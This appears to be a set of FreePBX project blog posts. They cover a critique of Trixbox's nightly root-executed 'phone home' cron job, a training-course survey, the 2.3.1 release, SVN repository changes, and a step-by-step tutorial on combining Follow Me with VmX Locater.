Security Concerns with Trixbox

Trixbox is a popular platform that packages our PBX application on top of Asterisk on a CentOS based distribution. There has been some recent news concerning bad security practices and potential privacy issues. In the best interest of all of our installed base, it is our hope that Fonality, the sponsors of Trixbox, will actively contact their installed base to make them aware of this serious security issue which could significantly compromise customer systems if not addressed quickly.

The privacy issues that are being discussed are not the topic of our concern and are between Fonality and their customer base. Our concern is the mechanism that they have used to implement the [i]phone home[/i] solution. You can read details in [i][url=http://www.trixbox.org/forums/trixbox-forums/open-discussion/trixbox-phones-home]this Trixbox thread[/url][/i] as well as other discussions on their forum and elsewhere.

The summary of the issue is they have installed a cron job which contacts the Fonality servers on a nightly basis, downloads a set of commands, executes those commands as root, and then sends data back to the their servers. In the wrong hands, this becomes a [i]trojan horse[/i] and the magnitude of disaster that it could create if their servers were compromised from outside or from disgruntled employees, or from compromised DNS servers (man in the middle) is immense.

In the above thread it is mentioned that FreePBX [i]phone’s home[/i] as well. Instead of splitting hairs over definitions, let me make it perfectly clear what FreePBX does. Most of you are aware of our [i]Online Module Repository[/i] that provides easy updates to new versions of FreePBX and its modules (vs. pulling tarballs manually). When you access our server, we transmit the following information: FreePBX and Asterisk version numbers and a unique identification number that is generated at installation time and can not be traced back to you. We generate this number by taking an md5sum hash of your MAC address. If you are running in a virtual environment such as a VMware or Xensource system we create the hash randomly. (We generate this so we don’t have to use IP addresses which can often be traced back to you, or when dynamic, doesn’t allow accurate information to be kept.) We use this information to properly serve your upgrades as we need to know what version of FreePBX you are running. In addition, we use this information to help us during beta programs. You may recall the [url=/news/2007-08-23/freepbx-2-3-0-and-new-website-simultaneously-released]statistics[/url] that I fed back to you during the FreePBX 2.3 Beta program that helped us gauge the level of beta and Asterisk 1.4 coverage. The Asterisk and FreePBX version statistics also helps us make good development decisions to serve our customer base.
This information is transmitted when you click on [i]Check for Updates Online[/i] or nightly if you have chosen to have updates checked for you. (The nightly checks execute the exact same code as the manual check, there is no difference).
If we ever wanted to obtain more detailed information about your system, it would be an opt-in only basis, the code would be there for you to see and we would never implement something that could pull arbitrary commands from a server just waiting to be compromised.

If there are any questions or concerns with FreePBX, please start the discussion in the Forum or contact me offline.

Philippe – On behalf of the FreePBX Team

Are You Interested in a Training & Certification Course?

We have had numerous requests to put on a training seminar to provide deeper knowledge of FreePBX, General PBX maintenance and how to market and sell against the traditional providers. We are investigating doing such a multi-day training course and would like to know your interest in such. We have heard from users who have been to courses put on by other organizations that they would like to see something from us that takes it up a notch as well as focuses purely on the FreePBX based market (regardless of which Distro you choose to use). And we have also heard that you are looking for such a course that includes testing and certification to demonstrate your knowledge to your customers and employers.

So, we would like to hear from you if this is something you would like and would pay typical rates to attend? We are considering something in the March time frame if the response is positive but we need to know in advance if there is adequate interest to make commitments for hotel space and training rooms.

If you would like to attend, is there a preference in locations? We have considered locations such as Las Vegas, Chicago and Charlotte, NC.

Please let us know through responses to this post, we look forward to hearing what our community is looking for in this space?

Philippe – on behalf of the FreePBX team

FreePBX 2.3.1 Maintenance Release

We are excited to announce the release of FreePBX version 2.3.1 today. Existing 2.3 installations can simply update their systems through the Online Module Admin repository by accepting the [i]FreePBX Framework[/i] and [i]Core[/i] module updates that are available online. This is the recommended upgrade procedure for existing installations that no longer requires you to download and install the new tarball.

If you need to download and install the tarball, instructions can be found here: [url=/download-freepbx]Download and Installation Instructions[/url] [b]Status on Previous Versions[/b]

It has been almost 4 months since the official 2.3 program was started. With over 14,000 known systems having installed or upgraded to 2.3, it has proven itself to be the most stable release of FreePBX ever. We strongly encourage users of earlier releases to bring yourself up-to-date with version 2.3 as we will concentrate all our efforts on the current and future releases and their will be no more maintenance releases to earlier versions. Since version 2.3 supports both Asterisk 1.2 and 1.4, you should be able to run any installation with the current version of FreePBX.

Expanded Repository Access and Some SVN Changes

What is SVN and what are you talking about? FreePBX keeps all of it’s source in our [url=/trac/browser]Revision Control System[/url] as does any properly run software project whether it is Open Source or not. For FreePBX, we use the Subversion SVN system. The purpose of such a system is to easily manage changes and releases, recover from mistakes, experiment with new functionality, etc.

The previous SVN repository allowed write access to be granted to a user to either the entire repository or none of it. Everyone can read it. This restriction has been a limiting factor in our ability to accommodate new developers who may not be ready to have access to the entire system but we may want to give them access to a particular subsection, experimental branch, etc.

Today we are announcing changes to the SVN repository that will allow such access. As part of that change, we created a new section of the repository for Contributed Modules to FreePBX. These modules have not yet or will not become part of the primary project but are available for all to access and for the authors to maintain. This is great news for both contributors and the users who are interested in getting access to these modules. You will no longer have to go looking for that tarball stored away in ticket XYZ and we will now be able to give individual contributors access to their own modules so that they can maintain them and provide visibility of changes and fixes just like you have with the rest of FreePBX. We are excited about this new capability which is just one more step in our [url=/freepbx-development]Open Source Development Philosophy[/url] to allow expanded access and community involvement in this great project!

If you have previously pulled code directly from SVN (with the [i]svn co[/i] command), then you should visit the [url=/support/documentation/installation/upgrading-your-system#svn]Installing From SVN[/url] instructions which will describe how you can [i]switch[/i] your current SVN copy to point to the new URL location using the [i]svn switch –relocate[/i] svn command.

For normal every day use and and access to the Module Admin Online Access within FreePBX, there is no change. Everything will continue to run as always. If you have previously contributed a module or have been hosting your own module and would like to get it in the repository you can either contact one of the developers (look for us in the #freepbx-dev IRC channel) or just [url=/trac/newticket]open a module submission ticket[/url] and either attach the tarball or give us a link where we can get it and add it to the repository. We will then provide you with access to it so that you can maintain it properly.

Follow Me or VmX Locater™ – Which One is for You?

Some people like to have all calls follow them and ring all
their phones. Others may prefer to not be bothered by every call; if the caller
really needs them now, they would like an option but prefer to have voicemail
handle the less urgent matters.
FreePBX offers two different features that are designed for these scenarios, Follow Me and VmX Locater. But why choose between the two when you can have the
best of both worlds?

Making Follow Me and
VmX Locater Work Together

These two powerful features are designed to work together so
you can have the ultimate solution for your personal needs. Instead of choosing
one or the other, why not have the caller choose what they want: leave
voicemail now, or try to locate you?

Let’s describe some behaviors that we would like to achieve
and then go about showing you how easy it is to configure this scenario.

Desired Call Flow

  • When a
    Caller calls and we are not in the office, we would like to send them to
    the voicemail system and present the unavailable
    greeting along with options to locate us if desired. If we are on the
    phone we would like them sent to the busy
    greeting and not present any options but voicemail. (If we had chosen to
    take the call, we would have done so on our Multi-Line or Call Waiting
    enabled phone.)
  • In the
    unavailable case, we instruct
    the caller that they may leave us a message now, or if urgent, they can
    have the system try to find us by pressing 1.
  • If the
    caller does not consider this urgent, they leave a message and are done.
  • If the
    caller considers this urgent, they choose option 1 and are sent to the Follow Me setup.
  • The Follow Me configuration attempts to
    find you. If not successful then it returns to voicemail, this time to the
    busy greeting where they no
    longer have an option to keep trying to find you. In your busy message you indicate you are
    not reachable at this time and they must leave voicemail or try you later.

Let’s walk through the steps required to enable this very
powerful and easy to configure setup. First we configure the user’s unavailable and busy greetings in voicemail. Next we enable VmX Locater for this user and create their Follow Me feature. Lastly, we configure our user’s VmX Locater and Follow Me settings from the User Portal (ARI).

Create the Messages

Let’s begin. Here are a couple of examples for the Unavailable and Busy messages:

Unavailable:

“I am not able to get
the phone right now. You can leave me a message after the beep or if this is
urgent, you can press 1 now to have the system try to find me. If it can not
find me you will be returned here to leave me a message”

Busy:

“I am either on
another line or not reachable at this time. Please leave me a message after the
beep.”

Enable the Features
in FreePBX

Now that we have the two messages, we will set out to
configure what was described above. The flow chart in Figure 1 describes our
desired behavior.

Follow Me / VmX Call Flow

 

Figure 1

We must first enable both the Follow Me and VmX Locater
features in FreePBX. Navigate to the desired extension/user GUI screen and
enable the VmX Locater feature. We
will use extension 200 in our example. You will need both Voicemail Status Enabled and VmX Locater™
Enabled
as shown in Figure 2.

Enable VmX Locater

Figure 2

The rest will be done in the ARI User Portal. Before going there,
we will also create the initial Follow Me
feature as shown in Figure 3. So while you are in the Extension/User GUI, click
on the Add Follow Me Settings (or Edit Follow Me Settings if one already
exists). You are taken to a screen similar to Figure 3.

Follow Me Setup

Figure 3

The important things to set here are the desired Ring Strategy and the Destination if not answered. (These can
not be set in the User Portal) Our favorite Ring Strategy is the RingallV2-prim which you can read more
about in one of our past articles here. To accomplish the goals we have set,
you will want to choose the Voicemail
<200> John Smith (busy) Destination
. We will configure the remaining
settings in the User Portal.

Configure the
Features in the User Portal (ARI)

With these features setup, we (or the user) move to the ARI User
Portal to finish. (Since you probably do not want to give normal user’s access
to FreePBX if you care about the integrity of your phone system.)

Log into the User Portal Recording Interface. (This is the
Recordings tab at the top of the FreePBX Screen, or navigate to it
directly). Next choose Follow Me on the Left navigation
section. Figure 4 shows what we have chosen to configure.

Follow Me ARI User Portal Configuration

Figure 4

We have chosen the following configurations:

Enable:

Unchecked – which means that phone calls will not
automatically be sent to our Follow Me
setup. This makes it only accessible through the VmX Locater.

Follow Me List:

We list the numbers that we want in our Follow Me list. Note that we must include our own extension if we
want it rung as well. Also note, there is no ‘#’ required at the end of an
external number. The system figures this out by itself.

Ring First For:

We like the initial ring time. This is not really necessary
in the example we are describing but makes it more convenient if you like to
switch back and forth between using Follow
Me
directly or only through the VmX Locater. You can leave it at 0 if it
does not apply to you.

Ring Follow Me List
for
:

Make sure this time is long enough for the user to answer their
cell phone and press 1 to confirm the call if using confirmation.

Use Confirmation:

Checking this box will assure that all calls sent to an
outside line (vs. internal FreePBX extensions) will require the user to confirm
the call by pressing 1. This keeps calls from dropping into cell phone
voicemail, answering machines or other undesired landing spots.

That provides our desired Follow Me configuration. We must now setup the VmX Locater configuration to. Choose the VmX™ Locater menu option and you will be presented with a screen as
shown in Figure 5.

VmX Locater ARI User Portal Configuration

Figure 5

We have configured the options as follows:

Use When:

By checking unavailable
but not busy we are configuring the
system as drawn in Figure 1. If the phone is busy, or the caller has already
flowed through the Follow Me process
and was sent to the busy destination
if no answer then you do not want them to be able to choose to keep trying your
Follow Me.

Voicemail Instructions:

This is a personal preference. If checked the caller will be
presented with the standard voicemail system instructions concerning leaving a
message, reviewing their message, etc. after playing your greetings. Un-checking
this box will disable that system message.

Press 0:

If you have a personal assistant or alternative choice for
what to do when people press 0, you can uncheck this box and provide the number
here. Otherwise the system default for zero-ing out of voicemail will be used.

Press 1:

Checking the Send to
Follow-Me
is what does our magic and makes sure that this option gets sent
to Follow Me even though we had
disabled it in the previous section.

Press 2:

If you really want to complicate your caller’s lives you can
present them with yet another option and put a number in for option 2. Some
people also choose to use this option but not “announce” that it is available. We’ll leave it to the reader’s
imagination of how they may choose to use this option. (And for those of you who
like to look under the hood, there are also options 3-9 that can be programmed
but are not exposed in the GUI.)

Summary

That is all there is to it. You can now go back and review
Figure 1 to see the call flow that is presented to callers when they try to
reach you. Both voicemail messages are recorded in the Voicemail system by the
user as they would always do so. The Follow-Me
and VmX Locater configurations are
controlled by the user in their ARI User Portal once created and enabled by the
Administrator. They can then easily manage their own configuration, whether
they choose the one described here or other preferences.

We hope this has been another useful addition to our
Technical Corner. We will will return to the Under the Hood series in our next article.